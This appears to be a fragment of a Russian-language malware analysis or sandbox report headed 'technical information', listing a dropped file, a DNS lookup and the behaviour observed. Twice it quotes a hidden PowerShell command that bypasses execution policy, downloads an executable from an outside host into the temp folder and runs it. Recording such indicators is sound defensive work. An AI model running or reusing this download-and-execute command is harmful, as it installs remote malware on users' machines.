Техническая информация
- https://mittcomm.com/mii/use/miiuse1.exe как %temp%\\miiuse1.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://mittcomm.com/mii/use/miiuse1.exe','%TEMP%\\miiuse1.exe') & %TEMP%\\miiuse1.exe
- DNS ASK mi###omm.com
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://mittcomm.com/mii/use/miiuse1.exe','%TEMP%\\miiuse1.exe') & %TEMP%\\miiuse1.exe' (со скрытым окном)